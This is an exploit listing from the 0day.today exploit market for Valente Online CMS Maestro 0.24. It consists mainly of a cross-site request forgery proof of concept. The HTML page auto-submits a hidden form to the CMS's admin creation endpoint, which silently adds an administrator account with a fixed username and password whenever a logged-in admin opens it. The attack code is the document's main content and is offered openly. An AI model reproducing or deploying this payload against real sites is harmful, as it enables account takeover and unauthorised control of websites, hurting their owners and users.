[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Valente Online CMS Meastro - CSRF Add Admin Account

Author
Mr.Hx
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-13701
Category
web applications
Date add
14-08-2010
Platform
php
===================================================
Valente Online CMS Meastro - CSRF Add Admin Account
===================================================


# Exploit Title: Valente Online CMS Meastro - [CSRF] Add Admin Account
# Author: Mr.Hx & cit@HoTMaiL.CoM
# Software Link: http://valenteonline.com
# Software Download: http://valenteonline.com/cms-maestro-downloads
# Type : CSRF
# Version: 0.24
# Greetz to : ShOzN & Group alm3r3fh & Sinor & Group HeRoEs & And All My Friends 
##################### Exploit Add Admin Account ##########################
<html>
<body onload="javascript:fireForms()">
<form method="POST" name="form0"
action="http://site.com/valente/admin.php?p=create_admin">
<input type="hidden" name="username" value="Mr.Hx@hotmail.com"/>
<input type="hidden" name="level" value="1"/>
<input type="hidden" name="password1" value="123321"/>
<input type="hidden" name="password2" value="123321"/>
<input type="submit" name="create" value="create"/>
<script>
document.getElementById('create').click();
</script>
</form>
</body>
</html>



#  0day.today [2024-11-15]  #